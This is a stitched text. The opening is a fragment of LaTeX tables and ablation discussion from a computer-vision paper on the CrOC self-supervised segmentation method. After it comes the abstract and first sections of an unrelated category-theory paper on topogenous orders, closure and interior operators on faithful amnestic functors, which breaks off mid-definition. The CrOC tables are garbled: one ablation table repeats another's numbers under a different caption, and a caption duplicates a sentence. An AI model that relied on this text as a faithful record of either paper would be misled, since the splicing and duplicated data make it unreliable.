IN & 58.9 & 58.7 & 48.2 & 55.3 \\ MPA [18] & ViT-S/16 / CC & 31.7 & 35.1 & 39.6 & 35.5 \\ CP\({}^{2}\)[39] & ViT-S/16 / IN+PVOC12 & 63.1 & 59.4 & 46.5 & 56.3 \\ \hline _Ours_ & & & & & \\ \hline **CrOC** & ViT-S/16 / CC+ & 54.5 & 55.6 & 49.7 & 53.3 \\ CoCo & ViT-S/16 / CC+ & 60.6 & 62.7 & 51.7 & 58.3 \\ CCO & ViT-S/16 / IN & **70.6** & **66.1** & **52.6** & **63.1** \\ \hline \hline \end{tabular} \end{table} Table 2: **Transfer results of linear segmentation task.** A linear layer is trained on top of the frozen spatial features. The mIoU scores are reported for ADE20k [50]. The pre-training dataset is either ImageNet [11], COCO, or COCO+. \begin{table} \begin{tabular}{l c c c c} \hline \hline Method & Model & Dataset & Epochs & mIoU \\ \hline _Global features_ & & & & \\ DINO [6] & ViT-S/16 & COCO & 300 & 18.5 \\ DINO [6] & ViT-S/16 & ImageNet & 800 & 26.8 \\ \hline _Local features_ & & & & \\ DenseCL [41] & ResNet50 & ImageNet & 200 & 24.3 \\ VICRegL [2] & ResNet50 & ImageNet & 300 & 23.7 \\ CP\({}^{2}\)[39] & ViT-S/16 & ImageNet+PVOC12 & 320 & 25.4 \\ \hline _Ours_ & & & & \\ \hline _Croc_ & ViT-S/16 & COCO & 300 & 23.2 \\ Croc & ViT-S/16 & COCO+ & 300 & 27.0 \\ Croc & ViT-S/16 & ImageNet & 300 & **28.4** \\ \hline \hline \end{tabular} \end{table} Table 1: **Transfer results of linear segmentation task.** A linear layer is trained on top of the frozen spatial features. The mIoU scores are trained on top of the frozen spatial features. The mIoU scores are reported on the PVOC12 [13], COCO-Things (CC-Th.), and COCO-Stuff (CC-St.) [29]. The pre-training dataset is either of ImageNet (IN) [11], COCO (CC), or COCO+ (CC+). are not adjustable to each baseline is sub-optimal. Overall we observe that producing features that can be clustered class-wise without labels remains an open challenge. ### Ablation study We scrutinize the roles played by different components of CrOC. Unless otherwise stated, \(\lambda_{\text{pos}}=3\), \(K_{\text{start}}=12\) and the keys tokens are used for the ablations. Rows corresponding to the chosen setting are highlighted. **Weight of the positional cues \(\lambda_{\text{pos}}\).** The first element that is ablated is the contribution of the positional bias to the overall performance. In Table 4, we observe that an increased positional bias leads to improved performance on the unsupervised segmentation task, but a slightly worsened one on the linear segmentation task. **Number of initial centroids \(K_{\text{start}}\).** As can be seen in Table 5, the linear segmentation scores monotonically increase with the number of initial centroids, whereas for unsupervised segmentation, there seems to be a middle ground. **Type of clustering tokens.** Table 6 shows that the choice of spatial tokens plays a determinant role in the downstream results and that the multi-clustering approach (Sec. 3.3.3) can yield a significant boost in performance compared to the case when the clustering uses last spatial tokens \(\mathbf{Z}^{(B-1)}\) (last). ## 5 Conclusion We introduced CrOC; a novel SSL pre-training method for dense downstream tasks. CrOC does not resort to using hand-crafted priors and the online clustering algorithm generates pseudo labels for both views in a single and united step. As such, the generated segmentation masks are more coherent and avoid encouraging similarity between objects not univocally represented in both views. CrOC is thoroughly evaluated on various downstream tasks and datasets. In spite of being pre-trained on a medium size scene-centric dataset, the proposed learning paradigm is competitive or outperforms existing methods using ImageNet. **Limitation.** As is the case with most dense SSL methods, CrOC is only implemented and tested with a single model. ## Acknowledgement This work is supported by the Personalized Health and Related Technologies (PHRT), grant number 2021/344. This project is also partially funded by the European Research Council (ERC) under the European Union's Horizon 2020 research and innovation program (Grant Agreement No. 101021347). We acknowledge EuroCC Belgium for awarding this project access to the LUMI supercomputer, owned by the EuroHPC Joint Undertaking, hosted by CSC (Finland) and the LUMI consortium. \begin{table} \begin{tabular}{l c c c c c} \hline \hline & \multicolumn{2}{c}{PVOC12} & \multicolumn{2}{c}{COCO-Things} & \multicolumn{2}{c}{COCO-Suff} \\ \cline{2-6} Tokens & Unsupervised & Linear & Unsupervised & Linear & Unsupervised & Linear \\ \hline last & 11.2 & 52.6 & 12.7 & 54.6 & 16.0 & 49.1 \\ queries & 8.3 & 55.1 & 7.6 & **56.5** & 11.9 & 49.8 \\ keys & 15.7 & **56.5** & 12.1 & **56.5** & 17.9 & **50.2** \\ matches & **16.5** & 55.2 & **16.0** & 55.8 & **21.5** & 49.5 \\ \hline \hline \end{tabular} \end{table} Table 6: **Ablation: type of tokens used for the clustering.** We evaluate the impact of using either of the keys, values, or queries tokens of the last transformer block. We report the mIoU scores for both the linear and unsupervised segmentation downstream tasks. \begin{table} \begin{tabular}{l c c c c c} \hline \hline Method & Model / Dataset & PVOC12 & CC-Th. & CC-St. & Avg. \\ \hline \hline \(Global\)_features_ & & & & & \\ BYOL [15] & ResNet50 / CC+ & 13.6 & 9.4 & 8.9 & 10.6 \\ DINO [6] & ViT-S/16 / CC & 5.2 & 9.4 & 14.0 & 9.5 \\ \hline \hline \multicolumn{5}{l}{_Local features_} & & & \\ DRL [47] & ResNet50 / CC+ & 11.9 & 12.0 & 13.7 & 12.5 \\ DenseCL [41] & ResNet50 / IN & 18.0 & **19.2** & 16.9 & 18.0 \\ SeCo [43] & ResNet50 / IN & 15.1 & 16.3 & 18.9 & 16.8 \\ ReSim [45] & ResNet50 / IN & 17.1 & 15.9 & 16.6 & 16.5 \\ FixPro [48] & ResNet50 / IN & 9.5 & 15.2 & 12.4 & 12.4 \\ VICRepL [2] & ResNet50 / IN & 13.9 & 11.2 & 16.0 & 13.7 \\ MAE [18] & ViT-S/16 / CC & 3.3 & 7.5 & 13.6 & 8.1 \\ CP2 [39] & ViT-S/16 / IN & 9.5 & 12.9 & 13.6 & 12.0 \\ \hline \multicolumn{5}{l}{_Ours_} & & & \\ \hline **CrOC** & ViT-S/16 / CC+ & 16.1 & 17.2 & 20.0 & 17.8 \\ **CrOC** & ViT-S/16 / CC+ & **20.6** & 17.1 & **21.9** & **19.9** \\ **CrOC** & ViT-S/16 / IN & 3.8 & 5.4 & 6.6 & 5.3 \\ \hline \hline \end{tabular} \end{table} Table 3: **Transfer results of unsupervised segmentation task.** The frozen spatial features of each image in a given dataset are clustered into as many clusters as there are classes in the dataset. The Hungarian matching algorithm is used to label the clusters. The mIoU scores are reported on PVOC12 [13], COCO-Things (CC-Th.) and COCO-Stuff (CC-St.) [29]. The pre-training dataset is either of ImageNet (IN) [11], COCO (CC), or COCO+ (CC+). \begin{table} \begin{tabular}{l c c c c c c} \hline \hline & \multicolumn{2}{c}{PVOC12} & \multicolumn{2}{c}{COCO-Things} & \multicolumn{2}{c}{COCO-Suff} \\ \cline{2-7} Tokens & Unsupervised & Linear & Unsupervised & Linear & Unsupervised & Linear \\ \hline last & 11.2 & 52.6 & 12.7 & 54.6 & 16.0 & 49.1 \\ queries & 8.3 & 55.1 & 7.6 & **56.5** & 11.9 & 49.8 \\ keys & 15.7 & **56.5** & 12.1 & **56.5** & 17.9 & **50.2** \\ matches & **16.5** & 55.2 & **16.0** & 55.8 & **21.5** & 49.5 \\ \hline \hline \end{tabular} \end{table} Table 4: **Ablation: positional cues weight \(\lambda_{\text{pos}}\).** We report the mIoU scores for linear and unsupervised segmentation tasks. \begin{table} \begin{tabular}{l c c c c c} \hline \hline & \multicolumn{2}{c}{PVOC12} & \multicolumn{2}{c}{COCO-Things} & \multicolumn{2}{c}{COCO-Suff} \\ \cline{2-7} \(K_{\text{start}}\) & Unsupervised & Linear & Unsupervised & Linear & Unsupervised & Linear \\ \hline 4 & 5.3 & 48.0 & 8.3 & 48.7 & 12.6 & 47.5 \\ 8 & **15.8** & 54.8 & **17.6** & 56.5 & **23.4** & 49.8 \\ 12 & 15.7 & **56.5** & **12.1** & **56.5** & 17.9 & **50.2** \\ 16 & 10.9 & **56.9** & 8.0 & **58.0** & 14.2 & **59.5** \\ \hline \hline \end{tabular} \end{table} Table 5: **Ablation: initial number of centroids \(K_{\text{start}}\).** We report the mIoU scores for both the linear and unsupervised segmentation downstream tasks.
2301.12722
Topogenous structures on faithful and amnestic functors
Departing from a suitable categorical concept of topogenous orders defined relative to the bifibration of subobjects, this note introduces and studies topogenous orders on faithful and amnestic functors. Amongst other things, it is shown that this approach captures the formal closure operators and leads to the introduction of formal interior operators. Turning to special morphisms relative to the orders introduced, we show that a morphism is strict relative to an order if the order preserves codomains of its cocartesian liftings while a morphism is final if the order reflects domains of its cartesian liftings. Key examples in topology and algebra that demonstrate our results are included.
Minani Iragi, David Holgate, Josef Slapal
2023-01-30T08:43:29Z
http://arxiv.org/abs/2301.12722v1
# Topogenous structures on faithful and amnestic functors ###### Abstract Departing from a suitable categorical concept of topogenous orders defined relative to the bifibration of subobjects, this note introduces and studies topogenous orders on faithful and amnestic functors. Amongst other things, it is shown that this approach captures the formal closure operators and leads to the introduction of formal interior operators. Turning to special morphisms relative to the orders introduced, we show that a morphism is strict relative to an order if the order preserves codomains of its cocartesian liftings while a morphism is final if the order reflects domains of its cartesian liftings. Key examples in topology and algebra that demonstrate our results are included. + Footnote †: E-mail addresses: \({}^{a}\)[email protected], \({}^{b}\)[email protected], \({}^{c}\)[email protected]. \({}^{*}\)Corresponding author. The first author acknowledges the support from the Brno University of Technology (BUT) under the project MeMoV II no. CZ.02.2.69/0.0/0.0/18-053/0016962. The second author acknowledges the National Research Foundation of South Africa. The third author acknowledges the support by BUT from the Specific Research Project no. FSI-S-20-6187. Introduction A topogenous order \(\sqsubset\) on a category \(\mathcal{C}\) equipped with a proper \((\mathcal{E},\)\(\mathcal{M})\)-factorization structure for morphisms is a family of binary relations, each on the subobject lattice, \(\mathrm{sub}X\), for an object \(X\) in \(\mathcal{C}\) (subject to some axioms) ([9]). This notion, which is crutial for the syntopogenous structures introduced by Csaszar ([3]) with the aim of proposing a unified approach to topological, uniform and proximity spaces, has played a salient role in providing a single setting study of categorical closure ([5]), interior ([10]) and neighbourhood ([17]) operators and led to the introduction of quasi-uniform structures in categories (see e.g [7, 8, 12, 14, 13]). Topogenous orders are easier to work with when it comes to the study of topological structures on categories. A new way of introducing topological structures on categories was proposed by Dikranjan and Giuli who originally defined the categorical closure operators. A closure operator on a finitely \(\mathcal{M}\)-complete category \(\mathcal{C}\) is a pointed endofunctor of \(\mathcal{M}\), where the class \(\mathcal{M}\) is seen as the full subcategory of the arrow category \(\mathcal{C}^{2}\) whose objects are the morphisms from \(\mathcal{M}\), which "commutes" with the codomain functor \(cod:\mathcal{M}\longrightarrow\mathcal{C}\). The functor \(cod\) is a bifibration and indeed, categorical closure operators are defined relative to the bifibration of \(\mathcal{M}\)-subobjects. Replacing \(\mathcal{M}\) by an arbitrary category and the codomain functor by a faithful and amnestic functor \(F\), called \(form\) in [15], the notion of formal closure operator was recently obtained in [6]. The formal closure operators behave well and keep most of the properties of the categorical closure operators. In particular, these closure operators capture epireflective subcategories through the notions of idempotency, coherently, and minimality. Viewing a categorical topogenous order as defined relative to the bifibration of subobjects, we replace the functor \(cod:\mathcal{M}\longrightarrow\mathcal{C}\) by a suitable form over \(\mathcal{C}\), described at the begining of the third section of this note. In this case, the subobject lattice of an object \(X\in\mathcal{C}\) is thought of as the \(fibre\) over \(X\) so that for any \(f:X\longrightarrow Y\) in \(\mathcal{C}\), we think of the image of a subobject as the codomain of a cocartesian lifting of \(f\) at the subobject. Dually, we think of the pre-image of a subobject of \(Y\) as the domain of a cartesian lifting of \(f\) at the suobject. This permits us to introduce and study a notion of topogenous orders on an appropriate faithful and amnestic functor which leads to the formal interior operators and includes the formal closure recently introduced as a particular case. While our motivation of studying topogenous structures on forms comes from topological functors, particularly the forgetful functor \(F:\mathbf{Top}\longrightarrow\mathbf{Set}\), our approach permits to obtain topogenous orders which act on quotients, subobjects, as well as fibres of topological functors - see section 5 for some examples. In section 2, we recall a number of categorical concepts and results needed for the study of topogenous structures on a form. Section 3 studies the topogenous structures on forms. We show that formal closure operators form a reflective subcategory in the category of formal topogenous structures. Interior operators on forms are then introduced and, for forms in which every fibre is a complete lattice, these operators are shown to be in a one-to-one correspondence with a special class of formal topogenous orders. In section 4, we study strict and final morphisms relative to the topogenous order introduced. Among other things, it is proved that a morphism is strict relative to a formal topogenous order if the order preserves the codomains of cocartesian liftings of the morphism. A final morphism relative to this order is the one for which the order reflects domains of its cartesian liftings. The note ends with section 5, which presents a number of examples that demonstrate our results. ## 2 Preliminaries We consider a functor \(F:{\cal A}\longrightarrow{\cal C}\). For an object \(X\) in \({\cal C}\), a _fibre_ over \(X\) is the subcategory \(F^{-1}X\) of \({\cal A}\) consisting of those objects \(A\) for which \(FA=X\) and those morphisms \(g\) satisfying \(Fg=1_{X}\) (see e.g [1]). The functor \(F\) is _faithful_ when for any \(f,g:A\longrightarrow B\) in \({\cal A}\), \(Ff=Fg\Rightarrow f=g\). \(F\) is _amnestic_ if for any isomorphism \(f:A\longrightarrow B\) in \({\cal A}\), \(Ff=1_{FA}\Rightarrow A=B\) and \(f=1_{A}\). For any \({\cal C}\)-morphism \(f:X\longrightarrow Y\), we define the relation \(\leq_{f}:F^{-1}X\longrightarrow F^{-1}Y\) by : \(A\leq_{f}B\) if and only if there is a \({\cal A}\)-morphism \(A\longrightarrow B\) such that \(F(A\longrightarrow B)=f\). In case \(f=1_{X}\), we write \(A\leq_{X}B\) (sometimes we omit the subscript and write \(A\leq B\)). If \(A\leq B\) and \(B\leq A\), then \(A\) and \(B\) are said to be _fibre-isomorphic_. Of course, if \(F\) is amnestic and \(A\) and \(B\) are fibre-isomorphic, then they are isomorphic (expressed as \(A\cong B\)). For any object \(X\in{\cal C}\), \(\leq_{X}\) is reflective and transitive. If the functor \(F\) is faithful, then \(\leq_{X}\) is anti-symmetric if and only \(F\) is amnestic. Let \(F:{\cal A}\longrightarrow{\cal C}\) be a faithful functor. According to [4], an \({\cal A}\)-morphism \(\alpha:A\longrightarrow B\) is an \(F\)-_lifting_ (or simply a lifting) of a \({\cal C}\)-morphism \(f:FA\longrightarrow FB\) if \(F\alpha=f\). We may sometimes say that a \({\cal C}\)-morphism \(f:FA\longrightarrow FB\) is an \({\cal A}\)-morphism if it has a lifting \(\alpha:A\longrightarrow B\). A _cartesian lifting_ of a \({\cal C}\)-morphism \(f:X\longrightarrow Y\) at \(B\in F^{-1}Y\) is a lifting of \(f\) with condomain \(B\) having the property that for any \(C\in{\cal A}\), a \({\cal C}\)-morphism \(g:FC\longrightarrow FA\) is an \({\cal A}\)-morphism whenever \(f\circ g:FC\longrightarrow FB\) is an \({\cal A}\)-morphism. Clearly, \(\alpha:A\longrightarrow B\) is a cartesian lifting of \(f:X\longrightarrow Y\) at \(B\in F^{-1}Y\) if and only if \(A\leq_{f}B\) and for any \(C\in{\cal A}\) and any \({\cal C}\)-morphism \(g:FC\longrightarrow FA\), \(C\leq_{f\circ g}B\Leftrightarrow C\leq_{g}A\). Dually, a _cocartesian lifting_ of \(f:X\longrightarrow Y\) at \(A\in F^{-1}X\) is a lifting of \(f\) with domain \(A\) having the property that for any \({\cal A}\)-object \(C\), a \({\cal C}\)-morphism \(g:FB\longrightarrow FC\) is an \({\cal A}\)-morphism whenever \(g\circ f:FA\longrightarrow FC\) is an \(\mathcal{A}\)-morphism. Clearly, \(\alpha:A\longrightarrow B\) is a cocartesian lifting of \(f:X\longrightarrow Y\) at \(A\in F^{-1}X\) if and only if \(A\leq_{f}B\) and for any \(C\in\mathcal{A}\) and any \(\mathcal{C}\)-morphism \(g:FB\longrightarrow FC\), \(B\leq_{g}C\Leftrightarrow A\leq_{g\circ f}C\). The codomain of a cocartesian lifting of \(f\) at \(A\), when it exists, shall be denoted by \(f.\ A\). Dually, the domain of a cartesian lifting of \(f\) at \(B\), when it exists, shall be denoted by \(B.\ f\). Thus, if \(\alpha:B.\ f\longrightarrow B\) (\(\alpha:A\longrightarrow f.\ A\)) is a cartesian (co-cartesian) lifting of \(f:X\longrightarrow Y\) at \(B\) (\(A\)), then \(C\leq_{g}B.\ f\Leftrightarrow C\leq_{f\circ g}B\) (\(f.\ A\leq_{g}C\Leftrightarrow A\leq_{g\circ f}C\)) whenever \(C\in\mathcal{A}\) and \(g:FC\longrightarrow X\) (\(g:Y\longrightarrow FC\)) is a \(\mathcal{C}\)-morphism. Following [2], a functor \(F:\mathcal{A}\longrightarrow\mathcal{C}\) is a _fibration_ if for every morphism \(f:X\longrightarrow Y\) and \(B\in F^{-1}Y\), there is a cartesian lift of \(f\) at \(B\). If \(F^{op}:\mathcal{A}^{op}\longrightarrow\mathcal{C}^{op}\), where the upper index "op" stands for "opposite", is a fibration, then \(F\) is said to be an _opfibration_. \(F\) is \(bifibration\) if it is both a fibration and an opfibration. In accordance with [15], by a _form_ over a category \(\mathcal{C}\), we understand a faithfull and amnestic functor \(F:\mathcal{A}\longrightarrow\mathcal{C}\). If \(F\) is the codomain functor \(\mathcal{M}\longrightarrow\mathcal{C}\) where \(\mathcal{M}\) is a class of monomorphisms in \(\mathcal{C}\) seen as the full subcategory of the arrow category \(\mathcal{C}^{2}\), then \(F\) is called the _form of \(\mathcal{M}\)-subobjects_. The dual concept to the one of the form of \(\mathcal{M}\)-subobjects is the _form of \(\mathcal{M}\)-quotients_. According to [16], a form \(F\) over a category \(\mathcal{C}\) is said to be _locally bounded_ if each of its fibres has an upper bound and a lower bound. The upper bound (resp. the lower bound) of \(F^{-1}X\) will be denoted by \(1^{X}\) (resp. \(0^{X}\)). \(F\) is said to be _bounded_ when it is locally bounded and for any morphism \(f:X\longrightarrow Y\) in \(\mathcal{C}\), both \(f.\ 1^{X}\) and \(0^{X}.\ f\) exist. The next Lemma that we recall from [16] is a consequence of properties of (co)cartesian liftings of morphisms. **Lemma 2.1**.: _Let \(F\) be a form over \(\mathcal{C}\) and \(f:X\longrightarrow Y\), \(g:Y\longrightarrow Z\ \mathcal{C}\)-morphisms._ 1. _For any_ \(A\in F^{-1}X\)_, if_ \(f.\ A\) _exists, then_ \(g.\ (f.\ A)\) _exists if and only if_ \((g\circ f).\ A\) _exists, in which case_ \(g.\ (f.\ A)=(g\circ f).\ A\)_. Dually, for any_ \(B\in F^{-1}Z\)_, if_ \(B.\ g\) _exists, then_ \((B.\ g).\ f) _is exists if and only if_ \(B.\ (g\circ f)\) _exists, in which case_ \((B.\ g).\ f=B.\ (g\circ f)\)_._ 2. _For any_ \(A_{1},A_{2}\in F^{-1}X\)_, if both_ \(f.\ A_{1}\) _and_ \(f.\ A_{2}\) _exist, then_ \(A_{1}\leq A_{2}\) _implies that_ \(f.\ A_{1}\leq f.\ A_{2}\)_. Dually, for any_ \(B_{1},B_{2}\in F^{-1}Y\)_, if both_ \(B_{1}.\ f\) _and_ \(B_{2}.\ f\) _exist, then_ \(B_{1}\leq B_{2}\) _implies that_ \(B_{1}.\ f\leq B_{2}.\ f\)__._ **Definition 2.1**.: _A closure operator \(C\) on a form \(F:\mathcal{A}\longrightarrow\mathcal{C}\)_ or a _formal closure operator_ is a family of maps \(\{C_{X}:F^{-1}X\longrightarrow\ F^{-1}X\mid X\in\mathcal{C}\}\) such that 1. \(A\leq C_{X}(A)\) for all \(A\in\ F^{-1}X\) and \(X\in\mathcal{C}\). 2. For any morphism \(f:X\longrightarrow Y\) in \(\mathcal{C}\), \(A\leq_{f}B\Rightarrow C_{X}(A)\leq_{f}C_{Y}(B)\) for all \(A\in\ F^{-1}X\) and \(B\in\ F^{-1}Y\). We shall denote by \(\mathrm{Clo}(F)\) the conglomerate of all closure operators on \(F\). \(\mathrm{Clo}(F)\) is ordered by \(\preceq\) as follows: for any \(C,C^{\prime}\in\mathrm{Clo}(F)\)\(C\preceq C^{\prime}\) if and only if \(C_{X}(A)\leq C^{\prime}_{X}(A)\) for all \(A\in\ F^{-1}X\) and \(X\in\mathcal{C}\). A closure operator \(C\) on \(F\) is idempotent if \(C\circ C=C\), that is \(C_{X}(C_{X}(A))=C_{X}(A)\) for all \(A\in\ F^{-1}X\) and \(X\in\mathcal{C}\). If \(F\) is a form such that for any \(f:X\longrightarrow Y\) in \(\mathcal{C}\), \(A\in F^{-1}X\) and \(B\in F^{-1}Y\), both \(f.\ A\) and \(B.\ f\) exist, then \((C2)\) in Definition 2.1 is equivalent to \((C3)\ f.\ A\leq_{Y}B\Rightarrow f.\ C_{X}(A)\leq_{Y}C_{Y}(A)\) and to \((C4)\ A\leq_{X}B.\ f\Rightarrow C_{X}(A)\leq_{X}C_{Y}(B).\ f\). We can also obtain \((C2)\) as a conjunction of \((C2^{\prime})\ A\leq_{X}B\Rightarrow C_{X}(A)\leq_{X}C_{Y}(B)\) and \((C2^{\prime\prime})\ f.\ C_{X}(A)\leq_{Y}C_{Y}(f.\ B)\) for suitable \(A\), \(B\). ## 3 Topogenous orders on forms For the rest of the paper, we work with a form \(F\) over a category \(\mathcal{C}\) such that for any \(f:X\longrightarrow Y\) in \(\mathcal{C}\), \(A\in F^{-1}X\) and \(B\in F^{-1}Y\), both \(f.\ A\) and \(B.\ f\) exist. We have the following useful Lemma. **Lemma 3.1**.: _Let \(F\) be a form over a category \(\mathcal{C}\), \(f:X\longrightarrow Y\) be a \(\mathcal{C}\)-morphism, and let \(A\in\ F^{-1}X\) and \(B\in\ F^{-1}Y\). Then \(A\leq_{X}(f.\ A).\ f\) and \(f.\ (B.\ f)\leq_{Y}B\). Moreover, if \(F\) reflects sections and \(f\) is a section, then \(A\cong(f.\ A).\ f\). Dually, if \(F\) reflects retractions and \(f\) is a retraction, then \(f.\ (B.\ f)\cong B\). If \(F\) reflects isomorphisms and \(f\) is an isomorphism with inverse \(g\), then for any \(A\in\ F^{-1}X\), \(f.\ A\cong A.\ g.\)_ Proof.: Let \(\beta:(f.\ A).\ f\longrightarrow f.\ A\) be a cartesian lifting of \(f\) at \(f.\ A\). Since \(f=f\circ 1_{X}:FA\longrightarrow F(f.\ A)\), there is a morphism \(h:A\longrightarrow(f.\ A).\ f\) with \(Fh=1_{X}\). Hence \(A\leq_{X}(f.\ A).\ f\). A dual argument shows that \(f.\ (B.\ f)\leq_{Y}B\). Let \(\alpha:A\longrightarrow f.\ A\) be a cocartesian lifting of \(f\) at \(A\), \(f\) be a section and let \(F\) reflect sections. Since \(F(\alpha)=F(\beta)=f\), we get that \(F(\beta\circ h)=F(\beta)\circ F(h)=F(\alpha)\circ 1_{X}=F(\alpha)\). Since \(F\) is faithful, we have that \(\alpha=\beta\circ h\) and \(\alpha\) is a section because \(F\) reflects sections. Therefore, \(h\) is a section, i.e. there is a morphism \(k:(f.\ A).\ f\longrightarrow A\) such that \(k\circ h=1_{A}\). Now, \(Fk=Fk\circ 1_{X}=Fk\circ Fh=F(k\circ h)=F1_{A}=1_{X}\). Consequently \((f.\ A).\ f\leq_{X}A\). Thus, \(A\) and \((f.\ A).\ f\) are fibre-isomorphic and hence isomorphic. A dual raisoning proves that \(f.\ (B.\ f)\cong B\). The last part of the proof follows from the fact that \(f\) is an isomorphism if and only if \(f\) is a retraction and a section. It is not difficult to see from Lemma 3.1 that \(f.-:F^{-1}X\longrightarrow F^{-1}Y\) which maps every \(A\in\ F^{-1}X\) to \(f.\ A\), and \(-.\ f:F^{-1}Y\longrightarrow F^{-1}X\), which maps every \(B\in\ F^{-1}Y\) to \(A.\ f\), form a Galois connection, i.e. \(f.\ A\leq_{Y}B\Leftrightarrow A\leq_{X}B.\ f\). Furthermore, the analysis of the proof of Lemma 3.1 shows that the condition that \(F\) reflects sections can be weakened to the condition that co-cartesian liftings of \(f\) preserve sections. Dually, the condition that \(F\) reflects retractions can be weakened to the condition that cartesian liftings of \(f\) preserve retractions. Let \(F\) be the form of \(\mathcal{M}\)-subobjects and \(\mathcal{C}\) a finetely \(\mathcal{M}\)-complete category endowed with a proper \((\mathcal{E},\,\mathcal{M})\)-factorization structure for morphisms. Then for any \(\mathcal{C}\)-morphism \(f:X\longrightarrow Y\), \(F^{-1}X\) is the subobject lattice while \(f.\;m\) (resp. \(n.\;f\) ) is simply the image (resp. pre-image) of a subobject, for appropriate \(m\) and \(n\). In addition, if \(\mathcal{C}\) has products of pairs so that sections in \(\mathcal{C}\) belong to \(\mathcal{M}\), then the conditions in Lemma 3.1 are satisfied. **Definition 3.1**.: _A topogenous \(order\sqsubset\) on \(F\) is a family \(\{\sqsubset_{X}\;|\;X\in\mathcal{C}\}\) of binary relations, each \(\sqsubset_{X}\) on \(F^{-1}X\), such that:_ 1. \(A\sqsubset_{X}B\Rightarrow A\leq_{X}B\) _for every_ \(A,B\in F^{-1}X\)_._ 2. \(A^{\prime}\leq_{X}A\sqsubset_{X}B\leq_{X}B^{\prime}\Rightarrow A^{\prime} \sqsubset_{X}B^{\prime}\) _for every_ \(A,B\in F^{-1}X\)_._ 3. _For every morphism_ \(f:X\longrightarrow Y\) _in_ \(\mathcal{C}\)_,_ \(f.\;A\sqsubset_{Y}B\Rightarrow A\sqsubset_{X}B.\;f\) _for_ \(A\in F^{-1}X\) _and_ \(B\in F^{-1}Y\)_._ It is quite clear that when \(F\) is the form of \(\mathcal{M}\)-subobjects and \(\mathcal{C}\) is finitely \(\mathcal{M}\)-complete, Definition 3.1 gives the categorical topogenous structures. We shall denote by \(\mathrm{TORD}(F)\) the conglomerate of all topogenous structures on \(F\). One orders \(\mathrm{TORD}(F)\) by \(\subseteq\) as follows: for any \(\sqsubset,\sqsubset^{\prime}\in\)\(\mathrm{TORD}(F)\), \(\sqsubset\subseteq\sqsubset^{\prime}\) if and only if for all \(X\in\mathcal{C}\) and \(A,B\in\;F^{-1}X\), \(A\sqsubset_{X}B\Rightarrow A\sqsubset_{X}^{\prime}B\). A topogenous order \(\sqsubset\) on \(F\) is interpolative if \(A\sqsubset_{X}B\) implies that there is \(C\in F^{-1}X\) such that \(A\sqsubset_{X}C\sqsubset_{X}B\). We denote by \(\mathrm{INTORD}(F)\) the class of all interpolative topogenous structures on \(F\). Consider the following conditions for topogenous orders on \(F\). 1. For \(\mathcal{A}_{I}=\{A_{i}\;|\;i\in I\}\subseteq F^{-1}X\), \((\forall i\in I,\;A_{i}\sqsubset_{X}B)\Rightarrow\bigvee A_{i}\sqsubset_{X}B\) if \(\bigvee A_{i}\) exists. 2. For \(\mathcal{B}_{I}=\{B_{i}\;|\;i\in I\}\subseteq_{X}F^{-1}X\), \((\forall i\in I,\;A\sqsubset_{X}B_{i})\Rightarrow A\sqsubset_{X}\bigwedge B_{i}\) if \(\bigwedge B_{i}\) exists. The conglomerate of all topogenous orders on \(F\) satisfying condition \((TM)\) (resp.\((TJ)\)) will be denoted by \(\mathrm{MTORD}(F)\) (resp. \(\mathrm{JTORD}(F)\)). \(\mathrm{MTORD}(F)\) and \(\mathrm{JTORD}(F)\) are closed under arbitrary intersections in \(\mathrm{TORD}(F)\) and are thus reflective subcategories. We next show that, for an appropriate form, the topogenous orders satisfying condition \((TM)\) are in one-to-one correspondence with the closure operators on \(F\). **Proposition 3.2**.: _Let \(F\) be a form such that each of its fibres is a complete lattice. For a topogenous order \(\sqsubset\) on \(F\) satisfying condition \((TM)\) and a closure operator \(C\) on \(F\), the assignments_ \[C\longmapsto\sqsubset^{C}\;\;\text{and}\;\;\sqsubset\longmapsto C^{\sqsubset}\] _where \(A\sqsubset_{X}^{C}B\Leftrightarrow C_{X}(A)\leq_{X}B\) and \(C^{\sqsubset}=\bigwedge\{B\in\ F^{-1}X\ |\ A\sqsubset_{X}B\}\), for any \(X\in\mathcal{C}\)and \(A,B\in F^{-1}X\) define order isomorphisms inverse to each other between MTORD(\(F\)) and Clo(\(F\)). Moreover, \(C^{\sqsubset}\) is idempotent if and only if \(\sqsubset\) is interpolative._ Proof.: For \(\sqsubset^{C}\), \((T1)\) and \((T2)\) are easily seen to be satisfied, and \((C1)\) is clear for \(C^{\sqsubset}\). Let \(f:X\longrightarrow Y\) be a \(\mathcal{C}\)-morphism and \(\sqsubset\in\) TORD(\(F\)). Then for any \(A\in F^{-1}X\) and \(B\in F^{-1}Y\) such taht \(A\leq_{f}B\), \(\{B^{\prime}.\ f\ |\ B\sqsubset B^{\prime}\}\subseteq\{A^{\prime}\ |\ A\sqsubset A^{\prime}\}\) by \((T3)\). This implies that \(C^{\sqsubset}_{X}(A)\leq_{X}C^{\sqsubset}_{Y}(B).\ f\Leftrightarrow C^{ \sqsubset}_{X}(A)\leq_{f}C^{\sqsubset}_{Y}(B).\) For \((T3)\), \(f.\ A\sqsubset_{Y}B\Leftrightarrow C^{\sqsubset}_{Y}(f.\ A)\leq_{Y}B \Rightarrow C^{\sqsubset}_{Y}(A)\leq_{f}B\Leftrightarrow C^{\sqsubset}_{Y}(A) \leq_{X}B.f\Leftrightarrow A\sqsubset_{X}B.\ f.\) Clearly, \(C\longrightarrow\)\(\sqsubset^{C}\) and \(\sqsubset\)\(C^{\sqsubset}\) preserve order and are inverse to each other. The fact that \(C^{\sqsubset}\) is idempotent if and only if \(\sqsubset\) is interpolative is clear from the construction of \(C^{\sqsubset}\). Proposition 3.2 together with the well established relationship between categorical closure operators, interior operators and topogenous structures (see [9, 11]) permit us to introduce formal interior operator and demonstrate that formal topogenous orders satisfying condition \((TJ)\) are indeed in a one-to-one correspondence with formal interior operators provided \(F\) is a form such that each of its fibres is a complete lattice. **Definition 3.2**.: An _operator_\(I\) on a form \(F:\mathcal{A}\longrightarrow\mathcal{C}\) or _formal interior operator_ is a family of maps \(\{I_{X}:F^{-1}X\longrightarrow\ F^{-1}X\ |\ X\in\mathcal{C}\}\) such that * \(I_{X}(A)\leq A\) for all \(A\in\ F^{-1}X\) and \(X\in\mathcal{C}\). * \(A\leq B\Rightarrow I_{X}(A)\leq I_{X}(B)\) for all \(A,B\in\ F^{-1}X\) and \(X\in\mathcal{C}\). * For any morphism \(f:X\longrightarrow Y\) in \(\mathcal{C}\), \(I_{Y}(B).\ f\leq I_{X}(B.\ f)\) for \(B\in\ F^{-1}Y\). We shall denote by Int(\(F\)) the conglomerate of all interior operators 